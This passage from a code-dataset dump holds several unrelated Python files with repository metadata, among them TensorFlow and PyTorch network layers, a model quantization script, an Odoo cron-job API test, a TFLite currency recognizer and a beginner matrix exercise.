tf.variable_scope(name):\n net = conv2d(x, [filter_size, filter_size, input_dim, output_dim], stride=stride, bias=bias, padding=padding,\n snorm=snorm, name='conv')\n if linear:\n out = net\n else:\n if af == \"relu\":\n out = relu(net, leaky)\n elif af == \"sigmoid\":\n out = sigmoid(net)\n elif af == \"tanh\":\n out = tanh(net)\n return out\n\ndef deconv_block(x, input_dim, output_dim, output_shape, filter_size=3, stride=1, bias=True, padding='SAME',\n leaky=False, linear=False, name='deconv_block'):\n with tf.variable_scope(name):\n net = deconv2d(x, [filter_size, filter_size, output_dim, input_dim], output_shape,\n stride=stride, bias=bias, padding=padding, name='deconv')\n if linear:\n out = net\n else:\n out = relu(net, leaky)\n return out\n\ndef conv2d_bn_block(x, input_dim, output_dim, is_train, filter_size=3, stride=1, bias=False, padding='SAME',\n snorm=False, leaky=False, name='conv_block'):\n with tf.variable_scope(name):\n net = conv2d(x, [filter_size, filter_size, input_dim, output_dim], stride=stride, bias=bias, padding=padding,\n snorm=snorm, name='conv')\n net = batch_norm(net, training=is_train, name='bn')\n out = relu(net, leaky)\n return out\n\ndef dwise_block(x, input_dim, channel_multiplier, filter_size=3, stride=1, bias=True, leaky=False, name='dw_block'):\n with tf.variable_scope(name):\n net = dwise_conv(x, input_dim, channel_multiplier, filter_size=filter_size, stride=stride, bias=bias, name='dw')\n out = relu(net, leaky)\n return out\n \ndef pwise_block(x, input_dim, output_dim, bias=True, leaky=False, name='pw_block'):\n with tf.variable_scope(name):\n net = pwise_conv(x, input_dim, output_dim, bias=bias, name='pw')\n out = relu(net, leaky)\n return out\n \ndef separable_block(x, input_dim, output_dim, filter_size=3, channel_multiplier=1, stride=1, bias=True, leaky=False, name='sp_block'):\n with tf.variable_scope(name):\n net = dwise_conv(x, input_dim, channel_multiplier, filter_size=filter_size, stride=stride, bias=bias, name='dw')\n net = relu(net, leaky)\n net = pwise_conv(net, input_dim*channel_multiplier, output_dim, bias=bias, name='pw')\n net = relu(net, leaky)\n out = net\n return out\n \ndef res_block(x, input_dim, output_dim, expansion_ratio, channel_multiplier=1,\n filter_size=3, stride=1, bias=True, leaky=False, shortcut=True, name='res_block'):\n with tf.variable_scope(name):\n # pw\n bottleneck_dim=round(expansion_ratio*input_dim)\n net = pwise_conv(x, input_dim, bottleneck_dim, bias=bias, name='pw')\n net = relu(net, leaky)\n # dw\n net = dwise_conv(net, bottleneck_dim, channel_multiplier, filter_size=filter_size, stride=stride, bias=bias, name='dw')\n net = relu(net, leaky)\n # pw & linear\n net = pwise_conv(net, bottleneck_dim*channel_multiplier, output_dim, bias=bias, name='pw_linear')\n \n # element wise add, only for stride==1\n if shortcut and stride == 1:\n in_dim=int(input_dim)\n if in_dim != output_dim:\n ins=pwise_conv(x,input_dim, output_dim, bias=bias, name='ex_dim')\n net=ins+net\n else:\n net=x+net\n return net\n\n\ndef res_block_with_attention(x, input_dim, output_dim, expansion_ratio, channel_multiplier=1,\n filter_size=3, stride=1, bias=True, leaky=False, shortcut=True, name='res_block_with_attention'):\n with tf.variable_scope(name):\n # pw\n bottleneck_dim = round(expansion_ratio * input_dim)\n net = pwise_conv(x, input_dim, bottleneck_dim, bias=bias, name='pw')\n net = relu(net, leaky)\n # dw\n net = dwise_conv(net, bottleneck_dim, channel_multiplier, filter_size=filter_size, stride=stride, bias=bias,\n name='dw')\n net = relu(net, leaky)\n # pw & linear\n net = pwise_conv(net, bottleneck_dim * channel_multiplier, output_dim, bias=bias, name='pw_linear')\n\n channel = net.get_shape().as_list()[-1]\n\n # spatial attention\n spatial_a = dwise_conv(net, channel, channel_multiplier, filter_size=7, stride=1, bias=True,\n name='spatial_dw')\n spatial_a = hard_sigmoid(spatial_a)\n net = net * spatial_a\n\n # element wise add, only for stride==1\n if shortcut and stride == 1:\n in_dim = int(input_dim)\n if in_dim != output_dim:\n ins = pwise_conv(x, input_dim, output_dim, bias=bias, name='ex_dim')\n net = ins + net\n else:\n net = x + net\n return net\n\ndef conv2d_bn_6_block(x, input_dim, output_dim, is_train, filter_size=3, stride=1, bias=False, padding='SAME', name='conv_block'):\n with tf.variable_scope(name):\n net = conv2d(x, [filter_size, filter_size, input_dim, output_dim], stride=stride, bias=bias, padding=padding, name='conv')\n net = batch_norm(net, training=is_train, name='bn')\n out = relu6(net)\n return out\n\ndef pwise_bn_6_block(x, input_dim, output_dim, is_train, bias=False, name='pw_block'):\n with tf.variable_scope(name):\n net = pwise_conv(x, input_dim, output_dim, bias=bias, name='pw')\n net=batch_norm(net, training=is_train, name='bn')\n out = relu6(net)\n return out\n \ndef res_bn_6_block(x, input_dim, output_dim, expansion_ratio, is_train, channel_multiplier=1,\n filter_size=3, stride=1, bias=False, shortcut=True, name='res_block'):\n with tf.variable_scope(name):\n # pw\n bottleneck_dim=round(expansion_ratio*input_dim)\n net = pwise_conv(x, input_dim, bottleneck_dim, bias=bias, name='pw')\n net = batch_norm(net, training=is_train, name='pw_bn')\n net = relu6(net)\n # dw\n net = dwise_conv(net, bottleneck_dim, channel_multiplier, filter_size=filter_size, stride=stride, bias=bias, name='dw')\n net = batch_norm(net, training=is_train, name='dw_bn')\n net = relu6(net)\n # pw & linear\n net = pwise_conv(net, bottleneck_dim*channel_multiplier, output_dim, bias=bias, name='pw_linear')\n net = batch_norm(net, training=is_train, name='pw_linear_bn')\n \n # element wise add, only for stride==1\n if shortcut and stride == 1:\n in_dim=int(input_dim)\n if in_dim != output_dim:\n ins=pwise_conv(x,input_dim, output_dim, bias=bias, name='ex_dim')\n net=ins+net\n else:\n net=x+net\n return net \n'''\nEnd of Blocks\n'''\n","repo_name":"Jerry0103240/Lightweight-and-Dynamic-Deblurring-for-IoT-enabled-Smart-Cameras","sub_path":"train_utils/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":12127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"19594112389","text":"lista1 = []\nlista2 = []\nlista3 = []\nmatriz = []\nsomapares = somacoluna = 0\nfor c in range(0, 3):\n lista1.append(int(input(f'Digite um valor para a [linha 0 coluna {c}]: ')))\nmatriz.append(lista1[:])\nfor i in range(0, 3):\n lista2.append(int(input(f'Digite um valor para a [linha 1 coluna {i}]: ')))\nmatriz.append(lista2[:])\nfor d in range(0, 3):\n lista3.append(int(input(f'Digite um valor para a [linha 2 coluna {d}]: ')))\nmatriz.append(lista3[:])\nfor num in matriz:\n print(f'[ {num[0]} ] [ {num[1]} ] [ {num[2]} ]')\nfor par in matriz:\n for j in range(0, len(par)):\n if par[j] % 2 ==0:\n somapares += par[j]\nfor colunaum in matriz:\n somacoluna += colunaum[2]\nprint('-=' * 20)\nprint(f'A soma de todos os valores pares é: {somapares}')\nprint(f'A soma dos valores da terceia coluna é: {somacoluna}')\nprint(f'O maior valor da segunda linha é {max(lista2)}')\nprint('-=' * 20)\nprint('\\033[33mFinalizado com Sucesso!\\033[m')","repo_name":"andreplacet/exercicios_python","sub_path":"exercicio87.py","file_name":"exercicio87.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"33571745062","text":"import base64\nimport requests\nfrom odoo.tests import tagged\nfrom odoo.tests.common import HttpSavepointCase, get_db_name\nfrom odoo.tools import config\n\n@tagged(\"lavka\", \"cron_jobs\")\nclass TestCronJobs(HttpSavepointCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cron_jobs = cls.env['ir.cron'].search([\n ('active', 'in', [True, False])\n ])\n cls.job_ids = []\n for i, job in enumerate(cron_jobs):\n job.active = True\n job.suspended = False\n cls.job_ids.append(job.id)\n\n cls.demo_user = cls.env.ref('base.user_admin')\n cls.db_name = get_db_name()\n\n def request_by_token(self, user, authorized=True, *args, **kwargs):\n token = f\"{self.db_name}:{user.openapi_token}\"\n _token = base64.b64encode(token.encode()).decode()\n headers = {}\n if authorized:\n headers = {\n 'Authorization': f'Basic {_token}',\n }\n p = kwargs.get(\"params\")\n port = config[\"http_port\"]\n url = f'http://localhost:{port}/api/v1/cron_jobs'\n self.opener = requests.Session()\n return self.opener.request(\n 'GET', url, timeout=30, headers=headers, params=p\n )\n\n def test_jobs(self):\n # выключаем\n data = {\n \"action\": \"suspend\",\n }\n resp = self.request_by_token(self.demo_user, params=data)\n # self.env.cr.commit()\n self.assertEqual(resp.status_code, 200)\n resp_data = resp.json()\n jobs = {i['job']: i for i in resp_data['jobs']}\n\n suspended_cron_jobs = self.env['ir.cron'].search([])\n for job in suspended_cron_jobs:\n self.assertTrue(job.suspended, job.name)\n self.assertFalse(job.active, job.name)\n info = jobs[job.cron_name]\n self.assertEqual(info['active'], job.active)\n self.assertEqual(info['suspended'], job.suspended)\n # включаем\n data = {\n \"action\": \"active\",\n }\n\n resp = self.request_by_token(self.demo_user, params=data)\n self.assertEqual(resp.status_code, 200)\n resp_data = resp.json()\n jobs = {i['job']: i for i in resp_data['jobs']}\n active_cron_jobs = self.env['ir.cron'].search([])\n for job in active_cron_jobs:\n self.assertTrue(job.active)\n self.assertFalse(job.suspended)\n info = jobs[job.cron_name]\n self.assertEqual(info['active'], job.active)\n self.assertEqual(info['suspended'], job.suspended)\n # выключаем на всякий случай\n data = {\n \"action\": \"suspend\",\n }\n self.request_by_token(self.demo_user, params=data)\n\n\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/tests/backend/test_cron_job_controller.py","file_name":"test_cron_job_controller.py","file_ext":"py","file_size_in_byte":2776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"42315912791","text":"#import tensorflow as tf\nfrom tflite_runtime.interpreter import Interpreter\nfrom numpy import expand_dims, array, float32\n#from tensorflow.keras.preprocessing import image\n#import importlib\nfrom os import listdir\nimport cv2\nimport capture, preprocess, speak\nimport json\n\nwith open('config.json') as config_file:\n config = json.load(config_file)\n\n# capture = getattr(importlib.import_module(\"capture\"), \"capture\")\n# init_cam = getattr(importlib.import_module(\"capture\"), \"init_cam\")\n# release_cam = getattr(importlib.import_module(\"capture\"), \"release_cam\")\n# preprocess_captured = getattr(importlib.import_module(\"preprocess\"), \"preprocess_captured\")\n#is_object_present = getattr(importlib.import_module(\"preprocess\"), \"is_object_present\")\n\nif config['capture_enabled']:\n\tcam = capture.init_cam(config[\"camera_device_str\"])\n\tif cam == None:\n\t\tprint(\"Error opening camera. Exiting.. \")\n\t\tif config[\"speaker_enabled\"]:\n\t\t\tspeak.speak(\"Error opening camera. Exiting.. \")\n\t\texit\n\nmodel_name = config[\"model_name\"]\nclasses = {0: 'fifty_2',\n 1: 'five',\n 2: 'fivehundred_2',\n 3: 'hundred',\n 4: 'hundred_2',\n 5: 'ten_2',\n 6: 'twenty_2',\n 7: 'twohundred',\n 8: 'twothousand'}\n# Load TFLite model and allocate tensors.\ninterpreter = Interpreter(model_path=\"models/\" + model_name + \".tflite\")\ninterpreter.allocate_tensors()\n\n# Get input and output tensors.\ninput_details = interpreter.get_input_details()\noutput_details = interpreter.get_output_details()\n\n\n# Test model on input data.\ninput_shape = input_details[0]['shape']\n#print(input_shape)\nwhile True:\n\tt = input(\"Exit? [N/y] : \")\n\tif t=='n' or t=='N' or t=='':\n\t\tpass\n\telse:\n\t\tif config['capture_enabled']:\n\t\t\tcapture.release_cam(cam)\n\t\tbreak\n\tif config['capture_enabled']:\n\t\tcapture.capture(cam, display_enabled = config[\"display_enabled\"], speaker_enabled=config[\"speaker_enabled\"],\n\t\tcapture_count = config[\"capture_count\"], capture_delay = config[\"capture_delay\"])\n\tif config['preprocess_enabled']:\n\t\tpreprocess.preprocess_captured()\n\n\tmajor_class_list = [0 for _ in range(len(classes))]\n\tmajor_conf_list = [0 for _ in range(len(classes))]\n\tfor f in listdir(\"preprocessed/\"):\n\t\t#img = image.load_img(\"preprocessed/\" + f, target_size=tuple(input_shape[1:3]))\n\t\timg = cv2.imread(\"preprocessed/\" + f) \n\t\timg = cv2.resize(img, tuple(input_shape[1:3]))\n\t\tinput_data = array(img, dtype=float32)\n\t\tinput_data /= 255.\n\t\tinput_data = expand_dims(input_data, axis=0)\n\t\tinterpreter.set_tensor(input_details[0]['index'], input_data)\n\n\t\tinterpreter.invoke()\n\n\t\t# The function `get_tensor()` returns a copy of the tensor data.\n\t\t# Use `tensor()` in order to get a pointer to the tensor.\n\t\toutput_data = interpreter.get_tensor(output_details[0]['index'])\n\t\tbestclass = 0\n\t\toutput_data = output_data[0]\n\t\tfor i in range(len(output_data)):\n\t\t\tif (output_data[i] > output_data[bestclass]):\n\t\t\t\tbestclass = i\n\t\tprint(classes[bestclass], \"Confidence : %.2f\" % output_data[bestclass])\n\t\tmajor_class_list[bestclass] += 1\n\t\tmajor_conf_list += output_data\n\t\n\tmajor_class = major_class_list.index(max(major_class_list))\n\tmajor_conf = major_conf_list[major_class] / major_class_list[major_class]\n\tmajor_class = list(classes[major_class].split('_'))\n\tif len(major_class) > 0:\n\t\tmajor_class = major_class[0] + \" type \" + major_class[1]\n\telse:\n\t\tmajor_class = major_class[0]\n\tif config[\"speaker_enabled\"]:\n\t\t\tspeak.speak_currency(major_class, round(major_conf, 2)*100)\n\t\t#os.remove(\"input/\"+f)\n\n","repo_name":"hemankundu/indian-currency-recognizer","sub_path":"Raspberry Pi files/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3505,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"74434905171","text":"import random\nimport argparse\nimport sys\n\nimport numpy as np\nfrom sklearn.metrics import accuracy_score\n\nfrom model import DeepFMs\nfrom utils import data_preprocess\nfrom utils.parameters import get_parser\nfrom utils.util import get_model, load_model_dic, get_logger\nfrom model.Datasets import Dataset, get_dataset\n\nimport torch\nfrom torchsummary import summary\n\nif __name__ == '__main__':\n parser = get_parser()\n pars = parser.parse_args()\n\n logger = get_logger('Quantization')\n logger.info(pars)\n\n field_size, train_dict, valid_dict, test_dict = get_dataset(pars)\n\n if not pars.save_model_path:\n logger.info(\"no model path given: -save_model_path\")\n sys.exit()\n\n model = get_model(field_size=field_size, cuda=pars.use_cuda and torch.cuda.is_available(),\n feature_sizes=train_dict['feature_sizes'], pars=pars, logger=logger)\n model = load_model_dic(model, pars.save_model_path, sparse=pars.prune)\n\n #summary(model, [(train_dict['index'].shape[1], 1), (train_dict['value'].shape[1], )], dtypes=[torch.long, torch.float], device=torch.device(\"cpu\"))\n\n if pars.use_cuda:\n model.cuda()\n\n logger.info('Original model:')\n model.print_size_of_model()\n model.run_benchmark(test_dict['index'], test_dict['value'], test_dict['label'], cuda=pars.use_cuda)\n\n # dynamic quantization (no CUDA allowed and dynamic after training)\n # https://pytorch.org/tutorials/recipes/recipes/dynamic_quantization.html\n # not really best for our use case:\n # This is used for situations where the model execution time is dominated by loading weights from memory rather than computing the matrix multiplications.\n # This is true for for LSTM and Transformer type models with small batch size.\n if pars.dynamic_quantization:\n quantized_model = load_model_dic(\n get_model(field_size=field_size, cuda=0, feature_sizes=train_dict['feature_sizes'],\n dynamic_quantization=True, pars=pars, logger=logger), pars.save_model_path,\n sparse=pars.prune) # no logger allowed here\n\n quantized_model.eval()\n quantized_model = torch.quantization.quantize_dynamic(quantized_model, {torch.nn.Linear}, dtype=torch.qint8)\n\n logger.info(\"Dynamic Quantization model:\")\n q = quantized_model.print_size_of_model()\n # logger.info(\"\\t{0:.2f} times smaller\".format(f / q))\n # logger.info(quantized_model)\n\n quantized_model.run_benchmark(test_dict['index'], test_dict['value'], test_dict['label'])\n\n torch.save(quantized_model.state_dict(), pars.save_model_path + '_dynamic_quant')\n\n # most commonly used form of quantization\n # embedding quantization in pytorch 1.7.1\n # Support for FP16 quantization\n # Embedding and EmbeddingBag quantization (8-bit + partial support for 4-bit)\n # https://discuss.pytorch.org/t/is-it-planned-to-support-nn-embeddings-quantization/89154\n # https://github.com/pytorch/pytorch/issues/41396\n if pars.static_quantization: # https://pytorch.org/tutorials/advanced/static_quantization_tutorial.html\n quantized_model = load_model_dic(\n get_model(field_size=field_size, cuda=0, feature_sizes=train_dict['feature_sizes'],\n static_quantization=True, pars=pars, logger=logger), pars.save_model_path, sparse=pars.prune)\n quantized_model.eval()\n\n quantized_model.qconfig = torch.quantization.get_default_qconfig('fbgemm')\n #quantized_model.qconfig = torch.quantization.get_default_qconfig('qnnpack')\n #quantized_model.qconfig = torch.quantization.default_qconfig\n\n quantized_model = torch.quantization.fuse_modules(quantized_model,\n [['net_1_linear_1', 'net_1_linear_1_relu'],\n ['net_1_linear_2', 'net_1_linear_2_relu'],\n ['net_1_linear_3', 'net_1_linear_3_relu']])\n\n torch.quantization.prepare(quantized_model, inplace=True)\n\n #logger.info(quantized_model)\n\n # Calibrate\n quantized_model.static_calibrate = True\n calibration_size = quantized_model.batch_size * 5\n Xi = train_dict['index'][:calibration_size]\n Xv = train_dict['value'][:calibration_size]\n y = train_dict['label'][:calibration_size]\n Xi = np.array(Xi).reshape((-1, quantized_model.field_size - quantized_model.num, 1))\n Xv = np.array(Xv)\n y = np.array(y)\n x_size = Xi.shape[0]\n quantized_model.eval()\n quantized_model.eval_by_batch(Xi, Xv, y, x_size)\n logger.info('Post Static Quantization: Calibration done')\n\n # Convert to quantized model\n quantized_model.static_calibrate = False\n torch.quantization.convert(quantized_model, inplace=True)\n\n # logger.info(quantized_model)\n logger.info(\"Post Static Quantization model:\")\n quantized_model.print_size_of_model()\n quantized_model.run_benchmark(test_dict['index'], test_dict['value'], test_dict['label'], cuda=pars.use_cuda)\n\n torch.save(quantized_model.state_dict(), pars.save_model_path + '_static_quant')\n\n # QAT supports CUDA with fake quantization: https://pytorch.org/docs/stable/quantization.html\n # convertion happens in evaluation method\n if pars.quantization_aware:\n quantized_model = get_model(field_size=field_size, cuda=1, feature_sizes=train_dict['feature_sizes'],\n quantization_aware=True, pars=pars, logger=logger)\n quantized_model.cuda()\n quantized_model.qconfig = torch.quantization.get_default_qat_qconfig('fbgemm')\n\n logger.info(quantized_model.qconfig)\n\n torch.quantization.prepare(quantized_model, inplace=True)\n #logger.info(quantized_model)\n quantized_model.fit(train_dict['index'], train_dict['value'], train_dict['label'], valid_dict['index'],\n valid_dict['value'], valid_dict['label'],\n prune=pars.prune, prune_fm=pars.prune_fm, prune_r=pars.prune_r, prune_deep=pars.prune_deep,\n emb_r=pars.emb_r, emb_corr=pars.emb_corr,\n quantization_aware=True)\n\n torch.save(quantized_model.state_dict(), pars.save_model_path + '_quant_aware')\n\n logger.info(\"Quantization Aware model:\")\n state_dict = torch.load(pars.save_model_path + '_quant_aware')\n quantized_model.load_state_dict(state_dict)\n quantized_model.to('cpu')\n quantized_model.eval()\n\n quantized_model.quantization_aware = True\n quantized_model.use_cuda = False\n\n q = quantized_model.print_size_of_model()\n # logger.info(\"\\t{0:.2f} times smaller\".format(f / q))\n quantized_model.run_benchmark(test_dict['index'], test_dict['value'], test_dict['label'], cuda=False)\n","repo_name":"BingzhangZhu/CTR_prediction","sub_path":"xsDeepFwFM_deprecated/quantization.py","file_name":"quantization.py","file_ext":"py","file_size_in_byte":6916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"21607703821","text":"# noinspection PyPep8Naming\nimport copy\nfrom dataclasses import dataclass\nfrom typing import Sequence, Optional\n\nimport torch\nimport torch.nn.functional as F\nfrom torch import nn\nfrom torch.nn import CrossEntropyLoss\n\nfrom arch.model import InvertResidualNetBlockMetaHyperparameters, SqueezeNASNet, \\\n InverseResidualMetaNetHyperparameters\nfrom arch.operations import Ops\n\n\n@dataclass(frozen=True)\nclass SqueezeNASNetCityscapesHyperparameters:\n init_channels: int\n blocks: Sequence[InvertResidualNetBlockMetaHyperparameters]\n num_classes: int\n skip_output_block_index: int\n mid_channels: int\n last_channels: Optional[int] = None\n\n def to_ds_mobile_net_hyperparameters(self, last_channels, num_classes, last_pooled_channels=None):\n if self.last_channels is not None:\n assert last_channels is None\n if self.last_channels is not None:\n last_channels = self.last_channels\n return InverseResidualMetaNetHyperparameters(init_channels=self.init_channels,\n blocks=copy.deepcopy(tuple(self.blocks)),\n last_channels=last_channels,\n num_classes=num_classes, last_pooled_channels=last_pooled_channels)\n\n\nclass Conv_BN_ReLU(nn.Module):\n def __init__(self, in_channels, out_channels, kernel, padding=0, dilation=1, groups=1, stride=1,\n transpose: bool = False):\n super().__init__()\n if transpose is False:\n self.conv = nn.Conv2d(in_channels, out_channels, kernel_size=kernel, padding=padding,\n bias=False, dilation=dilation, groups=groups, stride=stride)\n else:\n self.conv = nn.ConvTranspose2d(in_channels, out_channels, kernel_size=kernel, padding=padding,\n bias=False, dilation=dilation, groups=groups, stride=stride)\n self.bn = nn.BatchNorm2d(out_channels)\n self.relu = nn.ReLU(inplace=True)\n\n def forward(self, x):\n x = self.conv(x)\n x = self.bn(x)\n x = self.relu(x)\n return x\n\n\nclass ASPP(nn.Module):\n def __init__(self, in_ch: int, mid_ch: int, out_ch: int, rates=(6, 12, 18), groups=(1, 1, 1)):\n super().__init__()\n self._1x1_1_conv = Conv_BN_ReLU(in_ch, mid_ch, kernel=1)\n self._3x3_1_conv = Conv_BN_ReLU(in_ch, mid_ch, kernel=3, padding=rates[0], dilation=rates[0], groups=groups[0])\n self._3x3_2_conv = Conv_BN_ReLU(in_ch, mid_ch, kernel=3, padding=rates[1], dilation=rates[1], groups=groups[1])\n self._3x3_3_conv = Conv_BN_ReLU(in_ch, mid_ch, kernel=3, padding=rates[2], dilation=rates[2], groups=groups[2])\n self._1x1_2_conv = Conv_BN_ReLU(mid_ch * 4 + in_ch, out_ch, kernel=1)\n\n def forward(self, x):\n b, c, h, w = x.shape\n tmp1 = self._1x1_1_conv(x)\n tmp2 = self._3x3_1_conv(x)\n tmp3 = self._3x3_2_conv(x)\n tmp4 = self._3x3_3_conv(x)\n avg_pooled = F.avg_pool2d(x, (h, w), stride=(1, 1), padding=0, ceil_mode=False, count_include_pad=False)\n img_pool = F.interpolate(avg_pooled, size=(h, w), mode='nearest')\n tmp6 = torch.cat([tmp1, tmp2, tmp3, tmp4, img_pool], dim=1)\n return self._1x1_2_conv(tmp6)\n\n\nclass ASPP_Lite(nn.Module):\n def __init__(self, os16_channels, os8_channels, mid_channels, num_classes: int):\n super().__init__()\n self._1x1_TL = Conv_BN_ReLU(os16_channels, mid_channels, kernel=1)\n self._1x1_BL = nn.Conv2d(os16_channels, mid_channels, kernel_size=1) # TODO: bias=False?\n self._1x1_TR = nn.Conv2d(mid_channels, num_classes, kernel_size=1)\n self._1x1_BR = nn.Conv2d(os8_channels, num_classes, kernel_size=1)\n self.avgpool = torch.nn.AvgPool2d(kernel_size=49, stride=[16, 20], count_include_pad=False)\n\n def forward(self, os16, os8):\n assert os16.shape[-1] * 2 == os8.shape[-1], (os8.shape, os16.shape)\n t1 = self._1x1_TL(os16)\n B, C, H, W = t1.shape\n t2 = self.avgpool(os16)\n t2 = self._1x1_BL(t2)\n t2 = torch.sigmoid(t2)\n t2 = F.interpolate(t2, size=(H, W), mode='bilinear', align_corners=False)\n t3 = t1 * t2\n t3 = F.interpolate(t3, scale_factor=2, mode='bilinear', align_corners=False)\n t3 = self._1x1_TR(t3)\n t4 = self._1x1_BR(os8)\n return t3 + t4\n\n\nclass SqueezeNASNetCityscapes(nn.Module):\n def __init__(self, hyperparams: SqueezeNASNetCityscapesHyperparameters, genotype: Sequence[Ops], lr_aspp=True):\n super().__init__()\n self.hyperparams = hyperparams\n self.genotype = genotype\n self.lr_aspp = lr_aspp\n\n self.encoder = SqueezeNASNet(\n hyperparams=hyperparams.to_ds_mobile_net_hyperparameters(last_channels=None, num_classes=None),\n genotype=genotype)\n\n self.criterion = CrossEntropyLoss(ignore_index=255)\n\n mid_ch = hyperparams.mid_channels\n\n low_level_channels = None\n count = 0\n for block in hyperparams.blocks:\n count += block.num_repeat\n if count > self.hyperparams.skip_output_block_index:\n low_level_channels = block.num_channels\n break\n\n assert low_level_channels is not None\n\n if hyperparams.last_channels:\n last_channels = hyperparams.last_channels\n else:\n last_channels = hyperparams.blocks[-1].num_channels\n\n if self.lr_aspp:\n self.decoder = ASPP_Lite(os16_channels=last_channels, os8_channels=low_level_channels,\n mid_channels=mid_ch, num_classes=hyperparams.num_classes)\n else:\n self.decoder = ASPP(in_ch=last_channels, mid_ch=mid_ch, out_ch=mid_ch, groups=(mid_ch,) * 3)\n self.lowlevel1x1 = nn.Conv2d(low_level_channels, low_level_channels, 1)\n self.logits2 = Conv_BN_ReLU(mid_ch + low_level_channels, mid_ch + low_level_channels, 3,\n groups=mid_ch + low_level_channels, padding=1)\n self.logits3 = nn.Conv2d(low_level_channels + mid_ch, hyperparams.num_classes, kernel_size=1)\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n def forward(self, normalized_rgb, gt=None, rgb=None, fname=None):\n encoder_outputs = self.encoder(normalized_rgb)\n residuals_outputs = encoder_outputs['residuals_outputs']\n cur_feat = encoder_outputs['output']\n\n b, c, h, w = cur_feat.shape\n assert w >= h, cur_feat.shape\n\n low_level_feat = residuals_outputs[self.hyperparams.skip_output_block_index]\n\n if self.lr_aspp:\n logits = self.decoder(cur_feat, low_level_feat)\n logits = F.interpolate(logits, scale_factor=8, mode='bilinear', align_corners=True)\n\n else:\n logits = self.decoder(cur_feat)\n logits = F.interpolate(logits, scale_factor=4, mode='bilinear', align_corners=True)\n low_level_feat = self.lowlevel1x1(low_level_feat)\n logits = torch.cat((logits, low_level_feat), dim=1)\n logits = self.logits2(logits)\n logits = self.logits3(logits)\n logits = F.interpolate(logits, scale_factor=4, mode='bilinear', align_corners=True)\n\n if gt is None:\n return {'preds': logits}\n\n logits = logits.float()\n loss = self.criterion(logits, gt)\n return {'loss': loss, 'preds': logits}\n","repo_name":"ashaw596/squeezenas","sub_path":"arch/model_cityscapes.py","file_name":"model_cityscapes.py","file_ext":"py","file_size_in_byte":7725,"program_lang":"python","lang":"en","doc_type":"code","stars":68,"dataset":"github-code","pt":"66"} +{"seq_id":"36604066316","text":"import copy\nfrom typing import Optional, Any\nimport torch\nfrom torch import Tensor\nfrom torch.nn import functional as F \n \nclass MultiheadAttention(torch.nn.Module):\n def __init__(self,d_query:int,d_key:int,d_value:int, nhead:int, dropout=0.1):\n super(MultiheadAttention, self).__init__()\n # d_query = int(d_query/nhead)\n # d_key = int(d_key/nhead)\n\n self.dropout = torch.nn.Dropout(dropout)\n self.head_dim = d_value\n self.nhead = nhead\n self.scaling = float(d_query) ** -0.5\n self.d_query = d_query\n self.d_key = d_key\n self.d_value = d_value\n hidden_dim = 256\n # self.query_linear = torch.nn.Linear(nhead*d_query,nhead*d_query)\n # self.key_linear = torch.nn.Linear(nhead*d_key,nhead*d_key)\n self.query_linear = torch.nn.Sequential(torch.nn.Linear(d_query,hidden_dim),torch.nn.ReLU(),torch.nn.Linear(hidden_dim,nhead*d_query))\n self.key_linear = torch.nn.Sequential(torch.nn.Linear(d_key,hidden_dim),torch.nn.ReLU(),torch.nn.Linear(hidden_dim,nhead*d_key))\n self.value_linear = torch.nn.Sequential(torch.nn.Linear(d_value,hidden_dim),torch.nn.ReLU(),torch.nn.Linear(hidden_dim,nhead*d_value))\n # self.query_linear = torch.nn.Linear(d_query,nhead*d_query)\n # self.key_linear = torch.nn.Linear(d_key,nhead*d_key)\n # self.value_linear = torch.nn.Linear(d_value,nhead*d_value)\n self.out_linear = torch.nn.Linear(nhead*d_value,d_value)\n \n def forward(self,query: Tensor,key: Tensor, value: Tensor,attn_mask: Optional[Tensor] = None) -> Tensor:\n tgt_len, bsz, _ = query.size()\n query = self.query_linear(query)\n key = self.key_linear(key)\n value = self.value_linear(value)\n \n query *= self.scaling\n \n query = query.contiguous().view(tgt_len, bsz * self.nhead, self.d_query).transpose(0, 1)\n key = key.contiguous().view(-1, bsz * self.nhead, self.d_key).transpose(0, 1)\n value = value.contiguous().view(-1, bsz * self.nhead, self.d_value).transpose(0, 1)\n\n attn_output_weights = torch.bmm(query, key.transpose(1, 2))\n if attn_mask is not None:\n attn_mask = torch.repeat_interleave(attn_mask, self.nhead, dim=0)\n if attn_mask.dtype == torch.bool:\n attn_output_weights.masked_fill_(attn_mask, float('-inf'))\n else:\n attn_output_weights += attn_mask\n attn_output_weights = F.softmax(attn_output_weights, dim=-1)\n #print (torch.where(torch.isnan(attn_output_weights)))\n #exit()\n attn_output_weights = self.dropout(attn_output_weights)\n attn_output = torch.bmm(attn_output_weights, value)\n attn_output = attn_output.transpose(0, 1).contiguous().view(tgt_len, bsz,self.nhead*self.d_value)\n attn_output = self.out_linear(attn_output)\n return attn_output\n\n\nclass AttentionLayer(torch.nn.Module):\n def __init__(self,d_query,d_key,d_value,nhead, dim_feedforward=2048, dropout=0.1, activation=\"relu\"):\n super(AttentionLayer, self).__init__()\n self.self_attn1 = MultiheadAttention(d_query,d_key,d_value, nhead,dropout=dropout)\n self.self_attn2 = MultiheadAttention(d_value,d_value,d_value, nhead,dropout=dropout)\n\n self.linear1 = torch.nn.Linear(d_value, dim_feedforward)\n self.linear2 = torch.nn.Linear(dim_feedforward, d_value)\n self.norm = torch.nn.LayerNorm(d_value)\n self.activation = torch.nn.ReLU()\n\n def forward(self, query: Tensor, key: Tensor, value: Tensor,src_mask: Optional[Tensor] = None) -> Tensor:\n src = self.self_attn1(query, key, value, src_mask)\n src[torch.isnan(src)] = 0\n src = self.linear2(self.activation(self.linear1(src)))\n\n # src = 